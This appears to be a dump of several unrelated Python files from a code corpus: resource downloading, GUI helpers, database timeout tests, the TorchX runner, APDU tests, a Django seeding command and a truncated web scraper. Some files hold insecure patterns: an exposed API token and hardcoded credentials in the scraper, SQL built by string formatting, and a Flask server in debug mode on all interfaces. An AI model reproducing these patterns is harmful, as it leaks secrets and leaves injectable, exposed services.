return os.path.join(resource_dir, self.resource_map[resource_id][0])
def get_download_fun(self, resource_id):
"""Return the download function for the given resource.
Parameters
----------
resource_id : str
The ID of the resource.
Returns
-------
function
The download function for the given resource.
"""
return self.resource_map[resource_id][1]
def has_resource_file(self, resource_id):
"""Return True if the resource file exists for the given ID.
Parameters
----------
resource_id : str
The ID of the resource.
Returns
-------
bool
True if the resource file exists, false otherwise.
"""
fname = self.get_resource_file(resource_id)
return os.path.exists(fname)
def download_resource_file(self, resource_id, cached=True):
"""Download the resource file corresponding to the given ID.
Parameters
----------
resource_id : str
The ID of the resource.
cached : Optional[bool]
If True, the download is a pre-processed file from S3, otherwise
the download is obtained and processed from the primary source.
Default: True
"""
download_fun = self.get_download_fun(resource_id)
fname = self.get_resource_file(resource_id)
logger.info('Downloading \'%s\' resource file into %s%s.' %
(resource_id, fname, ' from cache' if cached else ''))
download_fun(fname, cached=cached)
def get_create_resource_file(self, resource_id, cached=True):
"""Return the path to the resource file, download if it doesn't exist.
Parameters
----------
resource_id : str
The ID of the resource.
cached : Optional[bool]
If True, the download is a pre-processed file from S3, otherwise
the download is obtained and processed from the primary source.
Default: True
Returns
-------
str
The path to the resource file.
"""
if not self.has_resource_file(resource_id):
logger.info(('Could not access \'%s\' resource'
' file, will download.') % resource_id)
self.download_resource_file(resource_id, cached)
return self.get_resource_file(resource_id)
def get_resource_ids(self):
"""Return a list of all the resource IDs managed by this manager."""
return list(self.resource_map.keys())
resource_manager = ResourceManager(RESOURCE_MAP)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
# By default we use the cache
parser.add_argument('--uncached', action='store_true')
# By default we use get_create which doesn't do anything if the resource
# already exists. With the download flag, we force re-download.
parser.add_argument('--download', action='store_true')
args = parser.parse_args()
resource_ids = resource_manager.get_resource_ids()
for resource_id in resource_ids:
if not args.download:
resource_manager.get_create_resource_file(resource_id,
cached=(not
args.uncached))
else:
resource_manager.download_resource_file(resource_id,
cached=(not args.uncached))
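# Illustrative usage sketch: resolve (and lazily download) a resource path
# through the module-level manager defined above.
#
#   from protmapper.resources import resource_manager
#   up_entries_path = resource_manager.get_create_resource_file('up')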
|
StarcoderdataPython
|
1785332
|
<gh_stars>0
def clear_all_entries(first_name, last_name, street, city, state, zipcode):
first_name.delete(0, "end")
last_name.delete(0, "end")
street.delete(0, "end")
city.delete(0, "end")
state.delete(0, "end")
zipcode.delete(0, "end")
first_name.focus_set()
def clear_all_widgets(window):
for widget in window.winfo_children():
widget.destroy()
|
StarcoderdataPython
|
4828999
|
<gh_stars>100-1000
from common import *
redis_con = None
redis_graph = None
class testQueryTimeout(FlowTestsBase):
def __init__(self):
self.env = Env(decodeResponses=True)
# skip test if we're running under Valgrind
if self.env.envRunner.debugger is not None or os.getenv('COV') == '1':
self.env.skip() # queries will be much slower under Valgrind
global redis_con
global redis_graph
redis_con = self.env.getConnection()
redis_graph = Graph(redis_con, "timeout")
def test01_read_query_timeout(self):
query = "UNWIND range(0,1000000) AS x WITH x AS x WHERE x = 10000 RETURN x"
try:
# The query is expected to timeout
redis_graph.query(query, timeout=1)
assert(False)
except ResponseError as error:
self.env.assertContains("Query timed out", str(error))
try:
# The query is expected to succeed
redis_graph.query(query, timeout=2000)
except:
assert(False)
def test02_configured_timeout(self):
# Verify that the module-level timeout is set to the default of 0
response = redis_con.execute_command("GRAPH.CONFIG GET timeout")
self.env.assertEquals(response[1], 0)
# Set a default timeout of 1 millisecond
redis_con.execute_command("GRAPH.CONFIG SET timeout 1")
response = redis_con.execute_command("GRAPH.CONFIG GET timeout")
self.env.assertEquals(response[1], 1)
# Validate that a read query times out
query = "UNWIND range(0,1000000) AS x WITH x AS x WHERE x = 10000 RETURN x"
try:
redis_graph.query(query)
assert(False)
except ResponseError as error:
self.env.assertContains("Query timed out", str(error))
def test03_timeout_index_scan(self):
# set timeout to unlimited
redis_con.execute_command("GRAPH.CONFIG SET timeout 0")
# construct a graph and create multiple indices
query = """UNWIND range(0, 500000) AS x CREATE (p:Person {age: x%90, height: x%200, weight: x%80})"""
redis_graph.query(query)
query = """CREATE INDEX ON :Person(age, height, weight)"""
redis_graph.query(query)
queries = [
# full scan
"MATCH (a) RETURN a",
# ID scan
"MATCH (a) WHERE ID(a) > 20 RETURN a",
# label scan
"MATCH (a:Person) RETURN a",
# single index scan
"MATCH (a:Person) WHERE a.age > 40 RETURN a",
# index scan + full scan
"MATCH (a:Person), (b) WHERE a.age > 40 RETURN a, b",
# index scan + ID scan
"MATCH (a:Person), (b) WHERE a.age > 40 AND ID(b) > 20 RETURN a, b",
# index scan + label scan
"MATCH (a:Person), (b:Person) WHERE a.age > 40 RETURN a, b",
# multi full and index scans
"MATCH (a:Person), (b:Person), (c), (d) WHERE a.age > 40 AND b.height < 150 RETURN a,b,c,d",
# multi ID and index scans
"MATCH (a:Person), (b:Person), (c:Person), (d) WHERE a.age > 40 AND b.height < 150 AND ID(c) > 20 AND ID(d) > 30 RETURN a,b,c,d",
# multi label and index scans
"MATCH (a:Person), (b:Person), (c:Person), (d:Person) WHERE a.age > 40 AND b.height < 150 RETURN a,b,c,d",
# multi index scans
"MATCH (a:Person), (b:Person), (c:Person) WHERE a.age > 40 AND b.height < 150 AND c.weight = 50 RETURN a,b,c"
]
for q in queries:
try:
# query is expected to timeout
redis_graph.query(q, timeout=1)
assert(False)
except ResponseError as error:
self.env.assertContains("Query timed out", str(error))
# rerun each query with timeout and limit
# expecting queries to run to completion
for q in queries:
q += " LIMIT 2"
redis_graph.query(q, timeout=10)
# validate that server didn't crash
redis_con.ping()
def test05_query_timeout_free_resultset(self):
query = "UNWIND range(0,1000000) AS x RETURN toString(x)"
try:
# The query is expected to timeout
redis_graph.query(query, timeout=10)
assert(False)
except ResponseError as error:
self.env.assertContains("Query timed out", str(error))
try:
# The query is expected to succeed
redis_graph.query(query, timeout=2000)
except:
assert(False)
|
StarcoderdataPython
|
3317200
|
from models.model import Model
class Rating(Model):
def __init__(self, table_name, is_active, value, user_id, site_id):
super(Rating, self).__init__(table_name, is_active)
self.value = value
self.user_id = user_id
self.site_id = site_id
def generate_insert(self):
return "insert into {} (value, user_id, site_id, is_active) values ({}, {}, {}, {});" \
.format(self.table_name, self.value, self.user_id, self.site_id, self.is_active)
def __repr__(self):
return "Site: {} rated with {} by {}".format(self.site_id, self.value, self.user_id)
|
StarcoderdataPython
|
75241
|
<reponame>ldworkin/torchx
#!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import json
import logging
import time
from datetime import datetime
from types import TracebackType
from typing import Any, Dict, Iterable, List, Mapping, Optional, Tuple, Type
from pyre_extensions import none_throws
from torchx.runner.events import log_event
from torchx.schedulers import get_schedulers
from torchx.schedulers.api import Scheduler, Stream
from torchx.specs import (
AppDef,
AppDryRunInfo,
AppHandle,
AppStatus,
CfgVal,
SchedulerBackend,
UnknownAppException,
from_function,
make_app_handle,
parse_app_handle,
runopts,
)
from torchx.specs.finder import get_component
logger: logging.Logger = logging.getLogger(__name__)
NONE: str = "<NONE>"
class Runner:
"""
TorchX individual component runner. Has the methods for the user to
act upon ``AppDefs``. The ``Runner`` will cache information about the
launched apps if they were launched locally otherwise it's up to the
specific scheduler implementation.
"""
def __init__(
self,
name: str,
schedulers: Dict[SchedulerBackend, Scheduler],
component_defaults: Optional[Dict[str, Dict[str, str]]] = None,
) -> None:
"""
Creates a new runner instance.
Args:
name: the human readable name for this session. Jobs launched will
inherit this name.
schedulers: a list of schedulers the runner can use.
"""
self._name: str = name
self._schedulers = schedulers
self._apps: Dict[AppHandle, AppDef] = {}
# component_name -> map of component_fn_param_name -> user-specified default val encoded as str
self._component_defaults: Dict[str, Dict[str, str]] = component_defaults or {}
def __enter__(self) -> "Runner":
return self
def __exit__(
self,
type: Optional[Type[BaseException]],
value: Optional[BaseException],
traceback: Optional[TracebackType],
) -> bool:
# This method returns False so that if an error is raise within the
# ``with`` statement, it is reraised properly
# see: https://docs.python.org/3/reference/compound_stmts.html#with
# see also: torchx/runner/test/api_test.py#test_context_manager_with_error
#
self.close()
return False
def close(self) -> None:
"""
Closes this runner and frees/cleans up any allocated resources.
Transitively calls the ``close()`` method on all the schedulers.
Once this method is called on the runner, the runner object is deemed
invalid and any methods called on the runner object as well as
the schedulers associated with this runner have undefined behavior.
It is ok to call this method multiple times on the same runner object.
"""
for name, scheduler in self._schedulers.items():
scheduler.close()
def run_component(
self,
component: str,
component_args: List[str],
scheduler: SchedulerBackend,
cfg: Optional[Mapping[str, CfgVal]] = None,
) -> AppHandle:
"""
Runs a component.
``component`` has the following resolution order(high to low):
* User-registered components. Users can register components via
https://packaging.python.org/specifications/entry-points/. Method looks for
entrypoints in the group ``torchx.components``.
* Builtin components relative to `torchx.components`. The path to the component should
be module name relative to `torchx.components` and function name in a format:
``$module.$function``.
* File-based components in format: ``$FILE_PATH:FUNCTION_NAME``. Both relative and
absolute paths supported.
Usage:
.. code-block:: python
# resolved to torchx.components.distributed.ddp()
runner.run_component("distributed.ddp", ...)
# resolved to my_component() function in ~/home/components.py
runner.run_component("~/home/components.py:my_component", ...)
Returns:
An application handle that is used to call other action APIs on the app
Raises:
ComponentValidationException: if component is invalid.
ComponentNotFoundException: if the ``component_path`` is failed to resolve.
"""
dryrun_info = self.dryrun_component(component, component_args, scheduler, cfg)
return self.schedule(dryrun_info)
def dryrun_component(
self,
component: str,
component_args: List[str],
scheduler: SchedulerBackend,
cfg: Optional[Mapping[str, CfgVal]] = None,
) -> AppDryRunInfo:
"""
Dryrun version of :py:func:`run_component`. Will not actually run the
component, but just returns what "would" have run.
"""
component_def = get_component(component)
app = from_function(
component_def.fn,
component_args,
self._component_defaults.get(component, None),
)
return self.dryrun(app, scheduler, cfg)
def run(
self,
app: AppDef,
scheduler: SchedulerBackend,
cfg: Optional[Mapping[str, CfgVal]] = None,
) -> AppHandle:
"""
Runs the given application in the specified mode.
.. note:: sub-classes of ``Runner`` should implement ``schedule`` method
rather than overriding this method directly.
Returns:
An application handle that is used to call other action APIs on the app.
"""
dryrun_info = self.dryrun(app, scheduler, cfg)
return self.schedule(dryrun_info)
def schedule(self, dryrun_info: AppDryRunInfo) -> AppHandle:
"""
Actually runs the application from the given dryrun info.
Useful when one needs to overwrite a parameter in the scheduler
request that is not configurable from one of the object APIs.
.. warning:: Use sparingly since abusing this method to overwrite
many parameters in the raw scheduler request may
lead to your usage of TorchX going out of compliance
in the long term. This method is intended to
unblock the user from experimenting with certain
scheduler-specific features in the short term without
having to wait until TorchX exposes scheduler features
in its APIs.
.. note:: It is recommended that sub-classes of ``Session`` implement
this method instead of directly implementing the ``run`` method.
Usage:
::
dryrun_info = session.dryrun(app, scheduler="default", cfg)
# overwrite parameter "foo" to "bar"
dryrun_info.request.foo = "bar"
app_handle = session.submit(dryrun_info)
"""
scheduler = none_throws(dryrun_info._scheduler)
cfg = dryrun_info._cfg
with log_event(
"schedule", scheduler, runcfg=json.dumps(cfg) if cfg else None
) as ctx:
sched = self._scheduler(scheduler)
app_id = sched.schedule(dryrun_info)
app_handle = make_app_handle(scheduler, self._name, app_id)
app = none_throws(dryrun_info._app)
self._apps[app_handle] = app
_, _, app_id = parse_app_handle(app_handle)
ctx._torchx_event.app_id = app_id
return app_handle
def name(self) -> str:
return self._name
def dryrun(
self,
app: AppDef,
scheduler: SchedulerBackend,
cfg: Optional[Mapping[str, CfgVal]] = None,
) -> AppDryRunInfo:
"""
Dry runs an app on the given scheduler with the provided run configs.
Does not actually submit the app but rather returns what would have been
submitted. The returned ``AppDryRunInfo`` is pretty formatted and can
be printed or logged directly.
Usage:
::
dryrun_info = session.dryrun(app, scheduler="local", cfg)
print(dryrun_info)
"""
# input validation
if not app.roles:
raise ValueError(
f"No roles for app: {app.name}. Did you forget to add roles to AppDef?"
)
for role in app.roles:
if not role.entrypoint:
raise ValueError(
f"No entrypoint for role: {role.name}."
f" Did you forget to call role.runs(entrypoint, args, env)?"
)
if role.num_replicas <= 0:
raise ValueError(
f"Non-positive replicas for role: {role.name}."
f" Did you forget to set role.num_replicas?"
)
cfg = cfg or dict()
with log_event("dryrun", scheduler, runcfg=json.dumps(cfg) if cfg else None):
sched = self._scheduler(scheduler)
sched._validate(app, scheduler)
dryrun_info = sched.submit_dryrun(app, cfg)
dryrun_info._scheduler = scheduler
return dryrun_info
def run_opts(self) -> Dict[str, runopts]:
"""
Returns the ``runopts`` for the supported scheduler backends.
Usage:
::
local_runopts = session.run_opts()["local"]
print("local scheduler run options: {local_runopts}")
Returns:
A map of scheduler backend to its ``runopts``
"""
return {
scheduler_backend: scheduler.run_opts()
for scheduler_backend, scheduler in self._schedulers.items()
}
def scheduler_backends(self) -> List[SchedulerBackend]:
"""
Returns a list of all supported scheduler backends.
"""
return list(self._schedulers.keys())
def status(self, app_handle: AppHandle) -> Optional[AppStatus]:
"""
Returns:
The status of the application, or ``None`` if the app does not exist anymore
(e.g. was stopped in the past and removed from the scheduler's backend).
"""
scheduler, scheduler_backend, app_id = self._scheduler_app_id(
app_handle, check_session=False
)
with log_event("status", scheduler_backend, app_id):
desc = scheduler.describe(app_id)
if not desc:
# app does not exist on the scheduler
# remove it from apps cache if it exists
# effectively removes this app from the list() API
self._apps.pop(app_handle, None)
return None
app_status = AppStatus(
desc.state,
desc.num_restarts,
msg=desc.msg,
structured_error_msg=desc.structured_error_msg,
roles=desc.roles_statuses,
)
if app_status:
app_status.ui_url = desc.ui_url
return app_status
def wait(
self, app_handle: AppHandle, wait_interval: float = 10
) -> Optional[AppStatus]:
"""
Block waits (indefinitely) for the application to complete.
Possible implementation:
::
while(True):
app_status = status(app)
if app_status.is_terminal():
return
sleep(10)
Args:
app_handle: the app handle to wait for completion
wait_interval: the minimum interval to wait before polling for status
Returns:
The terminal status of the application, or ``None`` if the app does not exist anymore
"""
scheduler, scheduler_backend, app_id = self._scheduler_app_id(
app_handle, check_session=False
)
with log_event("wait", scheduler_backend, app_id):
while True:
app_status = self.status(app_handle)
if not app_status:
return None
if app_status.is_terminal():
return app_status
else:
time.sleep(wait_interval)
def list(self) -> Dict[AppHandle, AppDef]:
"""
Returns the applications that were run with this session mapped by the app handle.
The persistence of the session is implementation dependent.
"""
with log_event("list"):
app_ids = list(self._apps.keys())
for app_id in app_ids:
self.status(app_id)
return self._apps
def stop(self, app_handle: AppHandle) -> None:
"""
Stops the application, effectively directing the scheduler to cancel
the job. Does nothing if the app does not exist.
.. note:: This method returns as soon as the cancel request has been
submitted to the scheduler. The application will be in a
``RUNNING`` state until the scheduler actually terminates
the job. If the scheduler successfully interrupts the job
and terminates it the final state will be ``CANCELLED``
otherwise it will be ``FAILED``.
"""
scheduler, scheduler_backend, app_id = self._scheduler_app_id(app_handle)
with log_event("stop", scheduler_backend, app_id):
status = self.status(app_handle)
if status is not None and not status.is_terminal():
scheduler.cancel(app_id)
def describe(self, app_handle: AppHandle) -> Optional[AppDef]:
"""
Reconstructs the application (to the best extent) given the app handle.
Note that the reconstructed application may not be the complete app as
it was submitted via the run API. How much of the app can be reconstructed
is scheduler dependent.
Returns:
AppDef or None if the app does not exist anymore or if the
scheduler does not support describing the app handle
"""
scheduler, scheduler_backend, app_id = self._scheduler_app_id(
app_handle, check_session=False
)
with log_event("describe", scheduler_backend, app_id):
# if the app is in the apps list, then short circuit everything and return it
app = self._apps.get(app_handle, None)
if not app:
desc = scheduler.describe(app_id)
if desc:
app = AppDef(name=app_id, roles=desc.roles)
return app
def log_lines(
self,
app_handle: AppHandle,
role_name: str,
k: int = 0,
regex: Optional[str] = None,
since: Optional[datetime] = None,
until: Optional[datetime] = None,
should_tail: bool = False,
streams: Optional[Stream] = None,
) -> Iterable[str]:
"""
Returns an iterator over the log lines of the specified job container.
.. note:: #. ``k`` is the node (host) id NOT the ``rank``.
#. ``since`` and ``until`` need not always be honored (depends on scheduler).
.. warning:: The semantics and guarantees of the returned iterator is highly
scheduler dependent. See ``torchx.specs.api.Scheduler.log_iter``
for the high-level semantics of this log iterator. For this reason
it is HIGHLY DISCOURAGED to use this method for generating output
to pass to downstream functions/dependencies. This method
DOES NOT guarantee that 100% of the log lines are returned.
It is totally valid for this method to return no or partial log lines
if the scheduler has already totally or partially purged log records
for the application.
Usage:
::
app_handle = session.run(app, scheduler="local", cfg=Dict[str, ConfigValue]())
print("== trainer node 0 logs ==")
for line in session.log_lines(app_handle, "trainer", k=0):
print(line)
Discouraged anti-pattern:
::
# DO NOT DO THIS!
# parses accuracy metric from log and reports it for this experiment run
accuracy = -1
for line in session.log_lines(app_handle, "trainer", k=0):
if matches_regex(line, "final model_accuracy:[0-9]*"):
accuracy = parse_accuracy(line)
break
report(experiment_name, accuracy)
Args:
app_handle: application handle
role_name: role within the app (e.g. trainer)
k: k-th replica of the role to fetch the logs for
regex: optional regex filter, returns all lines if left empty
since: datetime based start cursor. If left empty begins from the
first log line (start of job).
until: datetime based end cursor. If left empty, follows the log output
until the job completes and all log lines have been consumed.
Returns:
An iterator over the role k-th replica of the specified application.
Raise:
UnknownAppException: if the app does not exist in the scheduler
"""
scheduler, scheduler_backend, app_id = self._scheduler_app_id(
app_handle, check_session=False
)
with log_event("log_lines", scheduler_backend, app_id):
if not self.status(app_handle):
raise UnknownAppException(app_handle)
log_iter = scheduler.log_iter(
app_id,
role_name,
k,
regex,
since,
until,
should_tail,
streams=streams,
)
return log_iter
def _scheduler(self, scheduler: SchedulerBackend) -> Scheduler:
sched = self._schedulers.get(scheduler)
if not sched:
raise KeyError(
f"Undefined scheduler backend: {scheduler}. Use one of: {self._schedulers.keys()}"
)
return sched
def _scheduler_app_id(
self, app_handle: AppHandle, check_session: bool = True
) -> Tuple[Scheduler, str, str]:
"""
Returns the scheduler and app_id from the app_handle.
Set ``check_session`` to validate that the session name in the app handle
is the same as this session.
Raises:
ValueError: if ``check_session=True`` and the session in the app handle
does not match this session's name
KeyError: if no such scheduler backend exists
"""
scheduler_backend, _, app_id = parse_app_handle(app_handle)
scheduler = self._scheduler(scheduler_backend)
return scheduler, scheduler_backend, app_id
def __repr__(self) -> str:
return f"Runner(name={self._name}, schedulers={self._schedulers}, apps={self._apps})"
def get_runner(
name: Optional[str] = None,
component_defaults: Optional[Dict[str, Dict[str, str]]] = None,
**scheduler_params: Any,
) -> Runner:
"""
Convenience method to construct and get a Runner object. Usage:
.. code-block:: python
with get_runner() as runner:
app_handle = runner.run(component(args), scheduler="kubernetes", runcfg)
print(runner.status(app_handle))
Alternatively,
.. code-block:: python
runner = get_runner()
try:
app_handle = runner.run(component(args), scheduler="kubernetes", runcfg)
print(runner.status(app_handle))
finally:
runner.close()
Args:
name: human readable name that will be included as part of all launched
jobs.
scheduler_params: extra arguments that will be passed to the constructor
of all available schedulers.
"""
if not name:
name = "torchx"
schedulers = get_schedulers(session_name=name, **scheduler_params)
return Runner(name, schedulers, component_defaults)
|
StarcoderdataPython
|
106244
|
#!/usr/bin/python3
# IMPORTS
import logging
from modules import devMode
from website import create_app
# VARIABLES
app = create_app()
# MAIN
if __name__ == '__main__':
logging.basicConfig(filename='/var/log/peon/webui.log', filemode='a', format='%(asctime)s %(thread)d [%(levelname)s] - %(message)s', level=logging.INFO)
devMode()
logging.debug(app.run(host='0.0.0.0',port=80, debug=True))
|
StarcoderdataPython
|
1701582
|
<filename>chap25-functions/ex25.py
def break_words(stuff):
"""
This function will break up words for us
First: Print the whole sentence.
Second: Broken words will be printed
"""
result = stuff.split(' ')
print("whole sentence ={}".format(stuff))
print("broken words ={}".format(result))
print("")
return result
def sort_words(words):
"""Sorts the words."""
result = sorted(words)
print("whole sentence ={}".format(words))
print("sorted words ={}".format(result))
print("")
# Poop out
return result
def print_first_word(words):
"""Prints the first word after popping it off."""
word = words.pop(0)
print(word)
# Poop out
result = None
return result
def print_last_word(words):
"""Prints the last word after popping it off."""
word = words.pop(-1)
print(word)
# Poop out
result = None
return result
def sort_sentance(sentance):
    """Takes in a full sentence and returns the sorted words."""
    words = break_words(sentance)
    # Hand back the sorted words so callers can keep working with them
    result = sort_words(words)
    return result
def print_first_and_last(sentance):
"""Prints the first and last words of the sentnace."""
words = break_words(sentance)
print_first_word(words)
print_last_word(words)
# Poop out
result = None
return result
def print_first_and_last_sorted(sentnace):
"""Sorts the words then prints the first and last one."""
words = sort_sentance(sentnace)
print_first_word(words)
print_last_word(words)
# Poop out
result = None
return result
def main():
# Block of code to break the sentence sentence_01
sentence_01 = "All good things come to those who wait."
words_01 = break_words(sentence_01)
# Sort words
sort_words(words_01)
# print(words_01)
# Block of code to break the sentence sentence_02
sentence_02 = "If you can't beat e'm, join e'm."
words_02 = break_words(sentence_02)
# Block of code to break the sentence sentence_03
sentence_03 = "I have no special talent. I am only passionately curious."
words_03 = break_words(sentence_03)
# Block of code to break the sentence sentence_04
sentence_04 = "All that we are is the result of what we have thought."
words_04 = break_words(sentence_04)
# Block of code to break the sentence sentence_05
sentence_05 = "The future depends on what we do during the present."
words_05 = break_words(sentence_05)
# Block of code to break the sentence sentence_06
sentence_06 = "I'm a monkey and i'm proud of it."
words_06 = break_words(sentence_06)
# Block of code to break the sentence sentence_07
sentence_07 = "Early to bed and early to rise, makes a man healthy, wealthy, and wise."
words_07 = break_words(sentence_07)
# Block of code to break the sentence sentence_08
sentence_08 = "I am thankful for all those who said NO to me. It's because of them i'm doing it myself."
words_08 = break_words(sentence_08)
# Block of code to break the sentence sentence_09
sentence_09 = "Early to bed and early to rise, makes a man healthy, wealthy, and wise."
words_09 = break_words(sentence_09)
# Block of code to break the sentence sentence_10
sentence_10 = "Pearls don't lie on the seashore. If you want one, you must dive for it."
words_10 = break_words(sentence_10)
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
3333797
|
<gh_stars>0
#
# dbtool for MongoDB
# version 1.0.0
#
# author: João 'Jam' Moraes
# license: MIT
#
import src as DBTool
import json
from sys import argv
DBTool.app(argv)
|
StarcoderdataPython
|
1659844
|
<filename>inventory/templatetags/indirect.py
from django import template
from util.validators import ViconfValidators
import sys
register = template.Library()
@register.simple_tag
def indirect(variable, key):
return variable[key]
@register.simple_tag
def validatorclass(name):
validators = ViconfValidators.VALIDATORS
if name == 'none':
return ""
if name in validators:
return validators[name]['css_class']
else:
return ""
|
StarcoderdataPython
|
1799484
|
<filename>src/run.py
# -*- coding: utf-8 -*-
"""The entry point for mtriage.
Orchestrates selectors and analysers via CLI parameters.
Modules:
Each module corresponds to a web platform API, or some equivalent method
of programmatic retrieval.
TODO: document where to find selector and analyser design docs.
Attributes:
module (str): Indicates the platform or source from which media should be
analysed. The code that implements is module is self-contained to a
folder here in the 'select' folder.
config (dict of str: str): Hyperparameters that refine the analyse space.
These parameters are module-specific (although the aim is to create as
consistent as possible a parameter language across modules).
folder (str): The path to the directory where the data that is indexed
during the SELECT pass will be saved. This directory serves as a kind of
"working directory" during the SAMPLE and ANALYSE passes, in the sense
that all generated data is saved in this directory. The directory also
contains logs, and represents the 'saved state' of a media triage
analysis.
"""
import os
import yaml
from validate import validate_yaml
from lib.common.get import get_module
from lib.common.storage import LocalStorage
CONFIG_PATH = "/run_args.yaml"
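# Hedged illustration (added): a minimal run_args.yaml that _run_yaml() below could
# consume, inferred from the keys this module reads ("folder", "select", "analyse",
# "elements_in"). The module names "youtube" and "frames" are assumptions.
#
#   folder: /mtriage/data/demo
#   select:
#     name: youtube
#     config:
#       search_term: "demo query"
#   analyse:
#     - name: frames
#       config:
#         fps: 1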
def make_storage(cfg: dict) -> LocalStorage:
# TODO: generalise `folder` here to a `storage` var that is passed from YAML
return LocalStorage(folder=cfg["folder"])
def _run_analyser(ana: dict, base_cfg: dict, cfg: dict):
# run a single analyser
Analyser = get_module("analyse", ana["name"])
analyser = Analyser(
{
**ana["config"],
**base_cfg
} if "config" in ana.keys() else base_cfg,
ana["name"],
make_storage(cfg),
)
analyser.start_analysing()
def _run_yaml():
with open(CONFIG_PATH, "r") as c:
cfg = yaml.safe_load(c)
validate_yaml(cfg)
base_cfg = {}
if "select" not in cfg and "elements_in" in cfg:
base_cfg["elements_in"] = cfg["elements_in"]
sel = None
else:
# run select
sel = cfg["select"]
Selector = get_module("select", sel["name"])
selector = Selector(
sel["config"] if "config" in sel.keys() else {},
sel["name"],
make_storage(cfg),
)
selector.start_indexing()
selector.start_retrieving()
base_cfg["elements_in"] = [sel["name"]]
if "analyse" not in cfg:
return
analyse_phase = cfg["analyse"]
if isinstance(analyse_phase, dict):
_run_analyser(analyse_phase, base_cfg, cfg)
else:
for ana in analyse_phase:
_run_analyser(ana, base_cfg, cfg)
if sel is None:
# take the selector from elements in
fst = cfg["elements_in"][0]
sel = {"name": fst.split("/")[0]}
base_cfg["elements_in"] = [f"{sel['name']}/{ana['name']}"]
if __name__ == "__main__":
_run_yaml()
|
StarcoderdataPython
|
1120
|
<reponame>sebastien-riou/SATL
import os
import pysatl
from pysatl import CAPDU
if __name__ == "__main__":
def check(hexstr, expected):
capdu = CAPDU.from_hexstr(hexstr)
if capdu != expected:
raise Exception("Mismatch for input '"+hexstr+"'\nActual: "+str(capdu)+"\nExpected: "+str(expected))
def gencase(* ,LC ,LE):
assert(LC < 0x10000)
assert(LE <= 0x10000)
data = os.getrandom(LC)
hexstr = "00112233"
case4 = LC>0 and LE>0
case4e = case4 and (LC>0xFF or LE>0x100)
if LC>0:
if LC>0xFF or case4e:
hexstr += "00%04X"%LC
else:
hexstr += "%02X" % LC
hexstr += pysatl.Utils.hexstr(data, separator="")
if LE>0:
if case4e:
if LE == 0x10000:
hexstr += "0000"
else:
hexstr += "%04X"%LE
elif LE == 0x10000:
hexstr += "000000"
elif LE>0x100:
hexstr += "00%04X"%LE
elif LE == 0x100:
hexstr += "00"
else:
hexstr += "%02X" % LE
expected = hexstr
capdu = CAPDU(CLA=0x00, INS=0x11, P1=0x22, P2=0x33, DATA=data, LE=LE)
hexstr = capdu.to_hexstr()
if hexstr != expected:
raise Exception("Mismatch for LC=%d, LE=%d"%(LC,LE)+"\nActual: "+hexstr+"\nExpected: "+expected)
b = capdu.to_bytes()
assert(type(b) is bytes)
return (hexstr, capdu)
#check __repr__
expected = "pysatl.CAPDU.from_hexstr('00112233015502')"
capdu=None
exec("capdu="+expected)
assert(expected==repr(capdu))
#check well formed inputs
check("00112233", CAPDU(CLA=0x00, INS=0x11, P1=0x22, P2=0x33))
check("00 11 22 33", CAPDU(CLA=0x00, INS=0x11, P1=0x22, P2=0x33))
check("0x00,0x11,0x22,0x33", CAPDU(CLA=0x00, INS=0x11, P1=0x22, P2=0x33))
#check we tolerate less well formed inputs
check("00-11,22_33", CAPDU(CLA=0x00, INS=0x11, P1=0x22, P2=0x33))
check("""0x00 0x11 0x22
0x33""", CAPDU(CLA=0x00, INS=0x11, P1=0x22, P2=0x33))
check("1 2 304", CAPDU(CLA=0x01, INS=0x02, P1=0x03, P2=0x04))
LC_cases = [0,1,2,254,255,256,257,65534,65535]
LE_cases = LC_cases + [65536]
for LC in LC_cases:
for LE in LE_cases:
print(LC,LE)
check(*gencase(LC=LC, LE=LE))
|
StarcoderdataPython
|
11778
|
<filename>hear_me_django_app/accounts/management/commands/initial_users.py
from django.contrib.auth import get_user_model
from django.contrib.auth.hashers import make_password
from django.core.management.base import BaseCommand
from ._private import populate_user
User = get_user_model()
class Command(BaseCommand):
help = 'admin deployment'
def add_arguments(self, parser):
parser.add_argument('total', type=int, help='Indicates the number of users to be created')
def handle(self, *args, **kwargs):
total = kwargs['total']
populate_user(number=total)
obj, created = User.objects.get_or_create(name="root", password=make_password('<PASSWORD>!'), is_superuser=True)
message = "Successfully populated database with initial users"
if created:
message += f" Superuser {obj.name} ha been created"
self.stdout.write(self.style.SUCCESS(message))
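# Hedged usage note (added): given the path in the <filename> header above, this
# command would normally be invoked from the project root as, for example:
#
#   python manage.py initial_users 25
#
# where 25 is the required `total` argument declared in add_arguments().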
|
StarcoderdataPython
|
3361415
|
#!/usr/bin/python
# coding=UTF-8
import sys
import json
import urllib
import psycopg2
import git
import itertools
import os
import datetime
import time
import re
import urllib.request
student_amount = 300  # number of students to sample
db = psycopg2.connect(database="onlinejudge2", user="onlinejudge", password="<PASSWORD>", host="10.2.26.127", port="5432")
cursor = db.cursor()
code_copy=""
class Shixun(object):
def __init__(self,id,name,identifier):
self.id = id
self.name = name
self.identifier = identifier
self.user_ids = []
def get_shixun(self):
url = 'https://www.educoder.net/api/v1/sources/%s/shixun_detail?private_token=<KEY>' %self.identifier
req = urllib.request.Request(url)
res_data = urllib.request.urlopen(req)
res = json.loads(res_data.read())
self.myshixuns_count = res.get("myshixuns_count",0)
#print 'myshixuns_count',self.myshixuns_count
def get_myshixun(self,date='20190102'):
length = 1
pages = 0
this_amount = 0
        while length != 0 and this_amount <= student_amount: # select up to student_amount students
pages += 1
url = 'https://www.educoder.net/api/v1/sources/myshixuns_index?time=%s&private_token=hriEn3UwXfJs3PmyXnSG&page=%s' %(date,str(pages))
req = urllib.request.Request(url)
res_data = urllib.request.urlopen(req)
res = json.loads(res_data.read())
length = len(res)
for item in res:
item = item["myshixun"]
id = item.get("id","")
shixun_id = item.get("shixun_id","")
if shixun_id != self.id:
continue
user_id = item.get("user_id","")
                #### get git_url ####
url = 'https://www.educoder.net/api/v1/sources/search_myshixun?user_id=%s&shixun_id=%s&private_token=<KEY>' %(user_id,self.id)
reqq = urllib.request.Request(url)
res_dataa = urllib.request.urlopen(reqq)
ress = json.loads(res_dataa.read())
git_url = ress.get("git_url","")
#print 'git_url',git_url
                ### get identifier ###
for cha in self.challenge:
cha_id = cha.id
url = 'https://www.educoder.net/api/v1/sources/search_game?user_id=%s&challenge_id=%s&private_token=<KEY>' %(str(user_id),str(cha_id))
